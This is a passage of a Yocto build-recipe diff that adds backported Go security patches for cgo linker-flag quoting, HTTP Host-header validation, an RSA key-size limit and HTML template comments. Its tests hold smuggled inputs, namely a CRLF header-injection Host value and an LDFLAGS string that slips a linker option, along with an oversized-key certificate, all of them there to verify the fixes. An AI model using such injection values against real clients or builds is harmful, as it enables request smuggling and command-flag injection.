48index d26f9e76a374a..d0c6fe3d4c2c2 100644
49--- a/src/cmd/cgo/out.go
50+++ b/src/cmd/cgo/out.go
51@@ -47,7 +47,9 @@ func (p *Package) writeDefs() {
52
53 fflg := creat(*objDir + "_cgo_flags")
54 for k, v := range p.CgoFlags {
55- fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, strings.Join(v, " "))
56+ for _, arg := range v {
57+ fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
58+ }
59 if k == "LDFLAGS" && !*gccgo {
60 for _, arg := range v {
61 fmt.Fprintf(fgo2, "//go:cgo_ldflag %q\n", arg)
62diff --git a/src/cmd/go/internal/work/gccgo.go b/src/cmd/go/internal/work/gccgo.go
63index 08a4c2d8166c7..a048b7f4eecef 100644
64--- a/src/cmd/go/internal/work/gccgo.go
65+++ b/src/cmd/go/internal/work/gccgo.go
66@@ -280,14 +280,12 @@ func (tools gccgoToolchain) link(b *Builder, root *Action, out, importcfg string
67 const ldflagsPrefix = "_CGO_LDFLAGS="
68 for _, line := range strings.Split(string(flags), "\n") {
69 if strings.HasPrefix(line, ldflagsPrefix) {
70- newFlags := strings.Fields(line[len(ldflagsPrefix):])
71- for _, flag := range newFlags {
72- // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
73- // but they don't mean anything to the linker so filter
74- // them out.
75- if flag != "-g" && !strings.HasPrefix(flag, "-O") {
76- cgoldflags = append(cgoldflags, flag)
77- }
78+ flag := line[len(ldflagsPrefix):]
79+ // Every _cgo_flags file has -g and -O2 in _CGO_LDFLAGS
80+ // but they don't mean anything to the linker so filter
81+ // them out.
82+ if flag != "-g" && !strings.HasPrefix(flag, "-O") {
83+ cgoldflags = append(cgoldflags, flag)
84 }
85 }
86 }
87diff --git a/src/cmd/go/testdata/script/gccgo_link_ldflags.txt b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
88new file mode 100644
89index 0000000000000..4e91ae56505b6
90--- /dev/null
91+++ b/src/cmd/go/testdata/script/gccgo_link_ldflags.txt
92@@ -0,0 +1,20 @@
93+# Test that #cgo LDFLAGS are properly quoted.
94+# The #cgo LDFLAGS below should pass a string with spaces to -L,
95+# as though searching a directory with a space in its name.
96+# It should not pass --nosuchoption to the external linker.
97+
98+[!cgo] skip
99+
100+go build
101+
102+[!exec:gccgo] skip
103+
104+go build -compiler gccgo
105+
106+-- go.mod --
107+module m
108+-- cgo.go --
109+package main
110+// #cgo LDFLAGS: -L "./ -Wl,--nosuchoption"
111+import "C"
112+func main() {}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
new file mode 100644
index 0000000000..369eca581e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29405-2.patch
@@ -0,0 +1,38 @@
1From 1008486a9ff979dbd21c7466eeb6abf378f9c637 Mon Sep 17 00:00:00 2001
2From: Ian Lance Taylor <iant@golang.org>
3Date: Tue, 6 Jun 2023 12:51:17 -0700
4Subject: [PATCH] [release-branch.go1.20] cmd/cgo: correct _cgo_flags output
5
6For #60306
7For #60514
8
9Change-Id: I3f5d14aee7d7195030e8872e42b1d97aa11d3582
10Reviewed-on: https://go-review.googlesource.com/c/go/+/501298
11Run-TryBot: Ian Lance Taylor <iant@golang.org>
12TryBot-Result: Gopher Robot <gobot@golang.org>
13Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
14Reviewed-by: David Chase <drchase@google.com>
15Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
16---
17
18Upstream-Status: Backport [https://github.com/golang/go/commit/1008486a9ff979dbd21c7466eeb6abf378f9c637]
19CVE: CVE-2023-29405
20Signed-off-by: Ashish Sharma <asharma@mvista.com>
21
22
23 src/cmd/cgo/out.go | 2 +-
24 1 file changed, 1 insertion(+), 1 deletion(-)
25
26diff --git a/src/cmd/cgo/out.go b/src/cmd/cgo/out.go
27index d0c6fe3d4c2c2..a48f52105628a 100644
28--- a/src/cmd/cgo/out.go
29+++ b/src/cmd/cgo/out.go
30@@ -48,7 +48,7 @@ func (p *Package) writeDefs() {
31 fflg := creat(*objDir + "_cgo_flags")
32 for k, v := range p.CgoFlags {
33 for _, arg := range v {
34- fmt.Fprintf(fflg, "_CGO_%s=%s\n", arg)
35+ fmt.Fprintf(fflg, "_CGO_%s=%s\n", k, arg)
36 }
37 if k == "LDFLAGS" && !*gccgo {
38 for _, arg := range v {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
new file mode 100644
index 0000000000..080def4682
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-1.patch
@@ -0,0 +1,212 @@
1From 5fa6923b1ea891400153d04ddf1545e23b40041b Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 28 Jun 2023 13:20:08 -0700
4Subject: [PATCH] [release-branch.go1.19] net/http: validate Host header before
5 sending
6
7Verify that the Host header we send is valid.
8Avoids surprising behavior such as a Host of "go.dev\r\nX-Evil:oops"
9adding an X-Evil header to HTTP/1 requests.
10
11Add a test, skip the test for HTTP/2. HTTP/2 is not vulnerable to
12header injection in the way HTTP/1 is, but x/net/http2 doesn't validate
13the header and will go into a retry loop when the server rejects it.
14CL 506995 adds the necessary validation to x/net/http2.
15
16Updates #60374
17Fixes #61075
18For CVE-2023-29406
19
20Change-Id: I05cb6866a9bead043101954dfded199258c6dd04
21Reviewed-on: https://go-review.googlesource.com/c/go/+/506996
22Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
23TryBot-Result: Gopher Robot <gobot@golang.org>
24Run-TryBot: Damien Neil <dneil@google.com>
25(cherry picked from commit 499458f7ca04087958987a33c2703c3ef03e27e2)
26Reviewed-on: https://go-review.googlesource.com/c/go/+/507358
27Run-TryBot: Tatiana Bradley <tatianabradley@google.com>
28Reviewed-by: Roland Shoemaker <roland@golang.org>
29
30Upstream-Status: Backport [https://github.com/golang/go/commit/5fa6923b1ea891400153d04ddf1545e23b40041b]
31CVE: CVE-2023-29406
32Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
33---
34 src/net/http/http_test.go | 29 ---------------------
35 src/net/http/request.go | 47 ++++++++--------------------------
36 src/net/http/request_test.go | 11 ++------
37 src/net/http/transport_test.go | 18 +++++++++++++
38 4 files changed, 31 insertions(+), 74 deletions(-)
39
40diff --git a/src/net/http/http_test.go b/src/net/http/http_test.go
41index f4ea52d..ea38cb4 100644
42--- a/src/net/http/http_test.go
43+++ b/src/net/http/http_test.go
44@@ -49,35 +49,6 @@ func TestForeachHeaderElement(t *testing.T) {
45 }
46 }
47
48-func TestCleanHost(t *testing.T) {
49- tests := []struct {
50- in, want string
51- }{
52- {"www.google.com", "www.google.com"},
53- {"www.google.com foo", "www.google.com"},
54- {"www.google.com/foo", "www.google.com"},
55- {" first character is a space", ""},
56- {"[1::6]:8080", "[1::6]:8080"},
57-
58- // Punycode:
59- {"гофер.рф/foo", "xn--c1ae0ajs.xn--p1ai"},
60- {"bücher.de", "xn--bcher-kva.de"},
61- {"bücher.de:8080", "xn--bcher-kva.de:8080"},
62- // Verify we convert to lowercase before punycode:
63- {"BÜCHER.de", "xn--bcher-kva.de"},
64- {"BÜCHER.de:8080", "xn--bcher-kva.de:8080"},
65- // Verify we normalize to NFC before punycode:
66- {"gophér.nfc", "xn--gophr-esa.nfc"}, // NFC input; no work needed
67- {"goph\u0065\u0301r.nfd", "xn--gophr-esa.nfd"}, // NFD input
68- }
69- for _, tt := range tests {
70- got := cleanHost(tt.in)
71- if tt.want != got {
72- t.Errorf("cleanHost(%q) = %q, want %q", tt.in, got, tt.want)
73- }
74- }
75-}
76-
77 // Test that cmd/go doesn't link in the HTTP server.
78 //
79 // This catches accidental dependencies between the HTTP transport and
80diff --git a/src/net/http/request.go b/src/net/http/request.go
81index cb2edd2..2706300 100644
82--- a/src/net/http/request.go
83+++ b/src/net/http/request.go
84@@ -18,7 +18,6 @@ import (
85 "io/ioutil"
86 "mime"
87 "mime/multipart"
88- "net"
89 "net/http/httptrace"
90 "net/textproto"
91 "net/url"
92@@ -26,7 +25,8 @@ import (
93 "strconv"
94 "strings"
95 "sync"
96-
97+
98+ "golang.org/x/net/http/httpguts"
99 "golang.org/x/net/idna"
100 )
101
102@@ -557,12 +557,19 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
103 // is not given, use the host from the request URL.
104 //
105 // Clean the host, in case it arrives with unexpected stuff in it.
106- host := cleanHost(r.Host)
107+ host := r.Host
108 if host == "" {
109 if r.URL == nil {
110 return errMissingHost
111 }
112- host = cleanHost(r.URL.Host)
113+ host = r.URL.Host
114+ }
115+ host, err = httpguts.PunycodeHostPort(host)
116+ if err != nil {
117+ return err
118+ }
119+ if !httpguts.ValidHostHeader(host) {
120+ return errors.New("http: invalid Host header")
121 }
122
123 // According to RFC 6874, an HTTP client, proxy, or other
124@@ -717,38 +724,6 @@ func idnaASCII(v string) (string, error) {
125 return idna.Lookup.ToASCII(v)
126 }
127
128-// cleanHost cleans up the host sent in request's Host header.
129-//
130-// It both strips anything after '/' or ' ', and puts the value
131-// into Punycode form, if necessary.
132-//
133-// Ideally we'd clean the Host header according to the spec:
134-// https://tools.ietf.org/html/rfc7230#section-5.4 (Host = uri-host [ ":" port ]")
135-// https://tools.ietf.org/html/rfc7230#section-2.7 (uri-host -> rfc3986's host)
136-// https://tools.ietf.org/html/rfc3986#section-3.2.2 (definition of host)
137-// But practically, what we are trying to avoid is the situation in
138-// issue 11206, where a malformed Host header used in the proxy context
139-// would create a bad request. So it is enough to just truncate at the
140-// first offending character.
141-func cleanHost(in string) string {
142- if i := strings.IndexAny(in, " /"); i != -1 {
143- in = in[:i]
144- }
145- host, port, err := net.SplitHostPort(in)
146- if err != nil { // input was just a host
147- a, err := idnaASCII(in)
148- if err != nil {
149- return in // garbage in, garbage out
150- }
151- return a
152- }
153- a, err := idnaASCII(host)
154- if err != nil {
155- return in // garbage in, garbage out
156- }
157- return net.JoinHostPort(a, port)
158-}
159-
160 // removeZone removes IPv6 zone identifier from host.
161 // E.g., "[fe80::1%en0]:8080" to "[fe80::1]:8080"
162 func removeZone(host string) string {
163diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
164index 461d66e..0d417ff 100644
165--- a/src/net/http/request_test.go
166+++ b/src/net/http/request_test.go
167@@ -676,15 +676,8 @@ func TestRequestBadHost(t *testing.T) {
168 }
169 req.Host = "foo.com with spaces"
170 req.URL.Host = "foo.com with spaces"
171- req.Write(logWrites{t, &got})
172- want := []string{
173- "GET /after HTTP/1.1\r\n",
174- "Host: foo.com\r\n",
175- "User-Agent: " + DefaultUserAgent + "\r\n",
176- "\r\n",
177- }
178- if !reflect.DeepEqual(got, want) {
179- t.Errorf("Writes = %q\n Want = %q", got, want)
180+ if err := req.Write(logWrites{t, &got}); err == nil {
181+ t.Errorf("Writing request with invalid Host: succeded, want error")
182 }
183 }
184
185diff --git a/src/net/http/transport_test.go b/src/net/http/transport_test.go
186index fa0c370..0afb6b9 100644
187--- a/src/net/http/transport_test.go
188+++ b/src/net/http/transport_test.go
189@@ -6249,3 +6249,21 @@ func TestIssue32441(t *testing.T) {
190 t.Error(err)
191 }
192 }
193+
194+func TestRequestSanitization(t *testing.T) {
195+ setParallel(t)
196+ defer afterTest(t)
197+
198+ ts := newClientServerTest(t, h1Mode, HandlerFunc(func(rw ResponseWriter, req *Request) {
199+ if h, ok := req.Header["X-Evil"]; ok {
200+ t.Errorf("request has X-Evil header: %q", h)
201+ }
202+ })).ts
203+ defer ts.Close()
204+ req, _ := NewRequest("GET", ts.URL, nil)
205+ req.Host = "go.dev\r\nX-Evil:evil"
206+ resp, _ := ts.Client().Do(req)
207+ if resp != nil {
208+ resp.Body.Close()
209+ }
210+}
211--
2122.25.1
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
new file mode 100644
index 0000000000..637f46a537
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29406-2.patch
@@ -0,0 +1,114 @@
1From c08a5fa413a34111c9a37fd9e545de27ab0978b1 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 19 Jul 2023 10:30:46 -0700
4Subject: [PATCH] [release-branch.go1.19] net/http: permit requests with
5 invalid Host headers
6
7Historically, the Transport has silently truncated invalid
8Host headers at the first '/' or ' ' character. CL 506996 changed
9this behavior to reject invalid Host headers entirely.
10Unfortunately, Docker appears to rely on the previous behavior.
11
12When sending a HTTP/1 request with an invalid Host, send an empty
13Host header. This is safer than truncation: If you care about the
14Host, then you should get the one you set; if you don't care,
15then an empty Host should be fine.
16
17Continue to fully validate Host headers sent to a proxy,
18since proxies generally can't productively forward requests
19without a Host.
20
21For #60374
22Fixes #61431
23Fixes #61825
24
25Change-Id: If170c7dd860aa20eb58fe32990fc93af832742b6
26Reviewed-on: https://go-review.googlesource.com/c/go/+/511155
27TryBot-Result: Gopher Robot <gobot@golang.org>
28Reviewed-by: Roland Shoemaker <roland@golang.org>
29Run-TryBot: Damien Neil <dneil@google.com>
30(cherry picked from commit b9153f6ef338baee5fe02a867c8fbc83a8b29dd1)
31Reviewed-on: https://go-review.googlesource.com/c/go/+/518855
32Auto-Submit: Dmitri Shuralyov <dmitshur@google.com>
33Run-TryBot: Roland Shoemaker <roland@golang.org>
34Reviewed-by: Russ Cox <rsc@golang.org>
35
36Upstream-Status: Backport [https://github.com/golang/go/commit/c08a5fa413a34111c9a37fd9e545de27ab0978b1]
37CVE: CVE-2023-29406
38Signed-off-by: Ming Liu <liu.ming50@gmail.com>
39---
40 src/net/http/request.go | 23 ++++++++++++++++++++++-
41 src/net/http/request_test.go | 17 ++++++++++++-----
42 2 files changed, 34 insertions(+), 6 deletions(-)
43
44diff --git a/src/net/http/request.go b/src/net/http/request.go
45index 3100037386..91cb8a66b9 100644
46--- a/src/net/http/request.go
47+++ b/src/net/http/request.go
48@@ -582,8 +582,29 @@ func (r *Request) write(w io.Writer, usingProxy bool, extraHeaders Header, waitF
49 if err != nil {
50 return err
51 }
52+ // Validate that the Host header is a valid header in general,
53+ // but don't validate the host itself. This is sufficient to avoid
54+ // header or request smuggling via the Host field.
55+ // The server can (and will, if it's a net/http server) reject
56+ // the request if it doesn't consider the host valid.
57 if !httpguts.ValidHostHeader(host) {
58- return errors.New("http: invalid Host header")
59+ // Historically, we would truncate the Host header after '/' or ' '.
60+ // Some users have relied on this truncation to convert a network
61+ // address such as Unix domain socket path into a valid, ignored
62+ // Host header (see https://go.dev/issue/61431).
63+ //
64+ // We don't preserve the truncation, because sending an altered
65+ // header field opens a smuggling vector. Instead, zero out the
66+ // Host header entirely if it isn't valid. (An empty Host is valid;
67+ // see RFC 9112 Section 3.2.)
68+ //
69+ // Return an error if we're sending to a proxy, since the proxy
70+ // probably can't do anything useful with an empty Host header.
71+ if !usingProxy {
72+ host = ""
73+ } else {
74+ return errors.New("http: invalid Host header")
75+ }
76 }
77
78 // According to RFC 6874, an HTTP client, proxy, or other
79diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
80index fddc85d6a9..dd1e2dc2a1 100644
81--- a/src/net/http/request_test.go
82+++ b/src/net/http/request_test.go
83@@ -770,16 +770,23 @@ func TestRequestWriteBufferedWriter(t *testing.T) {
84 }
85 }
86
87-func TestRequestBadHost(t *testing.T) {
88+func TestRequestBadHostHeader(t *testing.T) {
89 got := []string{}
90 req, err := NewRequest("GET", "http://foo/after", nil)
91 if err != nil {
92 t.Fatal(err)
93 }
94- req.Host = "foo.com with spaces"
95- req.URL.Host = "foo.com with spaces"
96- if err := req.Write(logWrites{t, &got}); err == nil {
97- t.Errorf("Writing request with invalid Host: succeded, want error")
98+ req.Host = "foo.com\nnewline"
99+ req.URL.Host = "foo.com\nnewline"
100+ req.Write(logWrites{t, &got})
101+ want := []string{
102+ "GET /after HTTP/1.1\r\n",
103+ "Host: \r\n",
104+ "User-Agent: " + DefaultUserAgent + "\r\n",
105+ "\r\n",
106+ }
107+ if !reflect.DeepEqual(got, want) {
108+ t.Errorf("Writes = %q\n Want = %q", got, want)
109 }
110 }
111
112--
1132.34.1
114
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
new file mode 100644
index 0000000000..00685cc180
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-29409.patch
@@ -0,0 +1,175 @@
1From 2300f7ef07718f6be4d8aa8486c7de99836e233f Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Wed, 7 Jun 2023 15:27:13 -0700
4Subject: [PATCH] [release-branch.go1.19] crypto/tls: restrict RSA keys in
5 certificates to <= 8192 bits
6
7Extremely large RSA keys in certificate chains can cause a client/server
8to expend significant CPU time verifying signatures. Limit this by
9restricting the size of RSA keys transmitted during handshakes to <=
108192 bits.
11
12Based on a survey of publicly trusted RSA keys, there are currently only
13three certificates in circulation with keys larger than this, and all
14three appear to be test certificates that are not actively deployed. It
15is possible there are larger keys in use in private PKIs, but we target
16the web PKI, so causing breakage here in the interests of increasing the
17default safety of users of crypto/tls seems reasonable.
18
19Thanks to Mateusz Poliwczak for reporting this issue.
20
21Updates #61460
22Fixes #61579
23Fixes CVE-2023-29409
24
25Change-Id: Ie35038515a649199a36a12fc2c5df3af855dca6c
26Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1912161
27Reviewed-by: Damien Neil <dneil@google.com>
28Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
29Run-TryBot: Roland Shoemaker <bracewell@google.com>
30(cherry picked from commit d865c715d92887361e4bd5596e19e513f27781b7)
31Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1965487
32Reviewed-on: https://go-review.googlesource.com/c/go/+/514915
33Run-TryBot: David Chase <drchase@google.com>
34Reviewed-by: Matthew Dempsky <mdempsky@google.com>
35TryBot-Bypass: David Chase <drchase@google.com>
36
37Upstream-Status: Backport [https://github.com/golang/go/commit/2300f7ef07718f6be4d8aa8486c7de99836e233f]
38CVE: CVE-2023-29409
39Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
40---
41 src/crypto/tls/handshake_client.go | 8 +++
42 src/crypto/tls/handshake_client_test.go | 78 +++++++++++++++++++++++++
43 src/crypto/tls/handshake_server.go | 4 ++
44 3 files changed, 90 insertions(+)
45
46diff --git a/src/crypto/tls/handshake_client.go b/src/crypto/tls/handshake_client.go
47index 4fb528c..ba33ea1 100644
48--- a/src/crypto/tls/handshake_client.go
49+++ b/src/crypto/tls/handshake_client.go
50@@ -788,6 +788,10 @@ func (hs *clientHandshakeState) sendFinished(out []byte) error {
51 return nil
52 }
53
54+// maxRSAKeySize is the maximum RSA key size in bits that we are willing
55+// to verify the signatures of during a TLS handshake.
56+const maxRSAKeySize = 8192
57+
58 // verifyServerCertificate parses and verifies the provided chain, setting
59 // c.verifiedChains and c.peerCertificates or sending the appropriate alert.
60 func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
61@@ -798,6 +802,10 @@ func (c *Conn) verifyServerCertificate(certificates [][]byte) error {
62 c.sendAlert(alertBadCertificate)
63 return errors.New("tls: failed to parse certificate from server: " + err.Error())
64 }
65+ if cert.PublicKeyAlgorithm == x509.RSA && cert.PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
66+ c.sendAlert(alertBadCertificate)
67+ return fmt.Errorf("tls: server sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
68+ }
69 certs[i] = cert
70 }
71
72diff --git a/src/crypto/tls/handshake_client_test.go b/src/crypto/tls/handshake_client_test.go
73index 6bd3c37..8d20b2b 100644
74--- a/src/crypto/tls/handshake_client_test.go
75+++ b/src/crypto/tls/handshake_client_test.go
76@@ -1984,3 +1984,81 @@ func TestCloseClientConnectionOnIdleServer(t *testing.T) {
77 t.Errorf("Error expected, but no error returned")
78 }
79 }
80+
81+// discardConn wraps a net.Conn but discards all writes, but reports that they happened.
82+type discardConn struct {
83+ net.Conn
84+}
85+
86+func (dc *discardConn) Write(data []byte) (int, error) {
87+ return len(data), nil
88+}
89+
90+// largeRSAKeyCertPEM contains a 8193 bit RSA key
91+const largeRSAKeyCertPEM = `-----BEGIN CERTIFICATE-----
92+MIIInjCCBIWgAwIBAgIBAjANBgkqhkiG9w0BAQsFADASMRAwDgYDVQQDEwd0ZXN0
93+aW5nMB4XDTIzMDYwNzIxMjMzNloXDTIzMDYwNzIzMjMzNlowEjEQMA4GA1UEAxMH
94+dGVzdGluZzCCBCIwDQYJKoZIhvcNAQEBBQADggQPADCCBAoCggQBAWdHsf6Rh2Ca
95+n2SQwn4t4OQrOjbLLdGE1pM6TBKKrHUFy62uEL8atNjlcfXIsa4aEu3xNGiqxqur
96+ZectlkZbm0FkaaQ1Wr9oikDY3KfjuaXdPdO/XC/h8AKNxlDOylyXwUSK/CuYb+1j
97+gy8yF5QFvVfwW/xwTlHmhUeSkVSQPosfQ6yXNNsmMzkd+ZPWLrfq4R+wiNtwYGu0
98+WSBcI/M9o8/vrNLnIppoiBJJ13j9CR1ToEAzOFh9wwRWLY10oZhoh1ONN1KQURx4
99+qedzvvP2DSjZbUccdvl2rBGvZpzfOiFdm1FCnxB0c72Cqx+GTHXBFf8bsa7KHky9
100+sNO1GUanbq17WoDNgwbY6H51bfShqv0CErxatwWox3we4EcAmFHPVTCYL1oWVMGo
101+a3Eth91NZj+b/nGhF9lhHKGzXSv9brmLLkfvM1jA6XhNhA7BQ5Vz67lj2j3XfXdh
102+t/BU5pBXbL4Ut4mIhT1YnKXAjX2/LF5RHQTE8Vwkx5JAEKZyUEGOReD/B+7GOrLp
103+HduMT9vZAc5aR2k9I8qq1zBAzsL69lyQNAPaDYd1BIAjUety9gAYaSQffCgAgpRO
104+Gt+DYvxS+7AT/yEd5h74MU2AH7KrAkbXOtlwupiGwhMVTstncDJWXMJqbBhyHPF8
105+3UmZH0hbL4PYmzSj9LDWQQXI2tv6vrCpfts3Cqhqxz9vRpgY7t1Wu6l/r+KxYYz3
106+1pcGpPvRmPh0DJm7cPTiXqPnZcPt+ulSaSdlxmd19OnvG5awp0fXhxryZVwuiT8G
107+VDkhyARrxYrdjlINsZJZbQjO0t8ketXAELJOnbFXXzeCOosyOHkLwsqOO96AVJA8
108+45ZVL5m95ClGy0RSrjVIkXsxTAMVG6SPAqKwk6vmTdRGuSPS4rhgckPVDHmccmuq
109+dfnT2YkX+wB2/M3oCgU+s30fAHGkbGZ0pCdNbFYFZLiH0iiMbTDl/0L/z7IdK0nH
110+GLHVE7apPraKC6xl6rPWsD2iSfrmtIPQa0+rqbIVvKP5JdfJ8J4alI+OxFw/znQe
111+V0/Rez0j22Fe119LZFFSXhRv+ZSvcq20xDwh00mzcumPWpYuCVPozA18yIhC9tNn
112+ALHndz0tDseIdy9vC71jQWy9iwri3ueN0DekMMF8JGzI1Z6BAFzgyAx3DkHtwHg7
113+B7qD0jPG5hJ5+yt323fYgJsuEAYoZ8/jzZ01pkX8bt+UsVN0DGnSGsI2ktnIIk3J
114+l+8krjmUy6EaW79nITwoOqaeHOIp8m3UkjEcoKOYrzHRKqRy+A09rY+m/cAQaafW
115+4xp0Zv7qZPLwnu0jsqB4jD8Ll9yPB02ndsoV6U5PeHzTkVhPml19jKUAwFfs7TJg
116+kXy+/xFhYVUCAwEAATANBgkqhkiG9w0BAQsFAAOCBAIAAQnZY77pMNeypfpba2WK
117+aDasT7dk2JqP0eukJCVPTN24Zca+xJNPdzuBATm/8SdZK9lddIbjSnWRsKvTnO2r
118+/rYdlPf3jM5uuJtb8+Uwwe1s+gszelGS9G/lzzq+ehWicRIq2PFcs8o3iQMfENiv
119+qILJ+xjcrvms5ZPDNahWkfRx3KCg8Q+/at2n5p7XYjMPYiLKHnDC+RE2b1qT20IZ
120+FhuK/fTWLmKbfYFNNga6GC4qcaZJ7x0pbm4SDTYp0tkhzcHzwKhidfNB5J2vNz6l
121+Ur6wiYwamFTLqcOwWo7rdvI+sSn05WQBv0QZlzFX+OAu0l7WQ7yU+noOxBhjvHds
122+14+r9qcQZg2q9kG+evopYZqYXRUNNlZKo9MRBXhfrISulFAc5lRFQIXMXnglvAu+
123+Ipz2gomEAOcOPNNVldhKAU94GAMJd/KfN0ZP7gX3YvPzuYU6XDhag5RTohXLm18w
124+5AF+ES3DOQ6ixu3DTf0D+6qrDuK+prdX8ivcdTQVNOQ+MIZeGSc6NWWOTaMGJ3lg
125+aZIxJUGdo6E7GBGiC1YTjgFKFbHzek1LRTh/LX3vbSudxwaG0HQxwsU9T4DWiMqa
126+Fkf2KteLEUA6HrR+0XlAZrhwoqAmrJ+8lCFX3V0gE9lpENfVHlFXDGyx10DpTB28
127+DdjnY3F7EPWNzwf9P3oNT69CKW3Bk6VVr3ROOJtDxVu1ioWo3TaXltQ0VOnap2Pu
128+sa5wfrpfwBDuAS9JCDg4ttNp2nW3F7tgXC6xPqw5pvGwUppEw9XNrqV8TZrxduuv
129+rQ3NyZ7KSzIpmFlD3UwV/fGfz3UQmHS6Ng1evrUID9DjfYNfRqSGIGjDfxGtYD+j
130+Z1gLJZuhjJpNtwBkKRtlNtrCWCJK2hidK/foxwD7kwAPo2I9FjpltxCRywZUs07X
131+KwXTfBR9v6ij1LV6K58hFS+8ezZyZ05CeVBFkMQdclTOSfuPxlMkQOtjp8QWDj+F
132+j/MYziT5KBkHvcbrjdRtUJIAi4N7zCsPZtjik918AK1WBNRVqPbrgq/XSEXMfuvs
133+6JbfK0B76vdBDRtJFC1JsvnIrGbUztxXzyQwFLaR/AjVJqpVlysLWzPKWVX6/+SJ
134+u1NQOl2E8P6ycyBsuGnO89p0S4F8cMRcI2X1XQsZ7/q0NBrOMaEp5T3SrWo9GiQ3
135+o2SBdbs3Y6MBPBtTu977Z/0RO63J3M5i2tjUiDfrFy7+VRLKr7qQ7JibohyB8QaR
136+9tedgjn2f+of7PnP/PEl1cCphUZeHM7QKUMPT8dbqwmKtlYY43EHXcvNOT5IBk3X
137+9lwJoZk/B2i+ZMRNSP34ztAwtxmasPt6RAWGQpWCn9qmttAHAnMfDqe7F7jVR6rS
138+u58=
139+-----END CERTIFICATE-----`
140+
141+func TestHandshakeRSATooBig(t *testing.T) {
142+ testCert, _ := pem.Decode([]byte(largeRSAKeyCertPEM))
143+
144+ c := &Conn{conn: &discardConn{}, config: testConfig.Clone()}
145+
146+ expectedErr := "tls: server sent certificate containing RSA key larger than 8192 bits"
147+ err := c.verifyServerCertificate([][]byte{testCert.Bytes})
148+ if err == nil || err.Error() != expectedErr {
149+ t.Errorf("Conn.verifyServerCertificate unexpected error: want %q, got %q", expectedErr, err)
150+ }
151+
152+ expectedErr = "tls: client sent certificate containing RSA key larger than 8192 bits"
153+ err = c.processCertsFromClient(Certificate{Certificate: [][]byte{testCert.Bytes}})
154+ if err == nil || err.Error() != expectedErr {
155+ t.Errorf("Conn.processCertsFromClient unexpected error: want %q, got %q", expectedErr, err)
156+ }
157+}
158diff --git a/src/crypto/tls/handshake_server.go b/src/crypto/tls/handshake_server.go
159index b16415a..2e36840 100644
160--- a/src/crypto/tls/handshake_server.go
161+++ b/src/crypto/tls/handshake_server.go
162@@ -738,6 +738,10 @@ func (c *Conn) processCertsFromClient(certificate Certificate) error {
163 c.sendAlert(alertBadCertificate)
164 return errors.New("tls: failed to parse client certificate: " + err.Error())
165 }
166+ if certs[i].PublicKeyAlgorithm == x509.RSA && certs[i].PublicKey.(*rsa.PublicKey).N.BitLen() > maxRSAKeySize {
167+ c.sendAlert(alertBadCertificate)
168+ return fmt.Errorf("tls: client sent certificate containing RSA key larger than %d bits", maxRSAKeySize)
169+ }
170 }
171
172 if len(certs) == 0 && requiresClientCert(c.config.ClientAuth) {
173--
1742.25.1
175
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
new file mode 100644
index 0000000000..00def8fcda
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-39318.patch
@@ -0,0 +1,262 @@
1From 023b542edf38e2a1f87fcefb9f75ff2f99401b4c Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Thu, 3 Aug 2023 12:24:13 -0700
4Subject: [PATCH] [release-branch.go1.20] html/template: support HTML-like
5 comments in script contexts
6
7Per Appendix B.1.1 of the ECMAScript specification, support HTML-like
8comments in script contexts. Also per section 12.5, support hashbang
9comments. This brings our parsing in-line with how browsers treat these
10comment types.
11
12Thanks to Takeshi Kaneko (GMO Cybersecurity by Ierae, Inc.) for
13reporting this issue.
14
15Fixes #62196
16Fixes #62395
17Fixes CVE-2023-39318
18
19Change-Id: Id512702c5de3ae46cf648e268cb10e1eb392a181
20Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1976593
21Run-TryBot: Roland Shoemaker <bracewell@google.com>
22Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
23Reviewed-by: Damien Neil <dneil@google.com>
24Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
25Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/2014620
26Reviewed-on: https://go-review.googlesource.com/c/go/+/526098
27Run-TryBot: Cherry Mui <cherryyz@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29
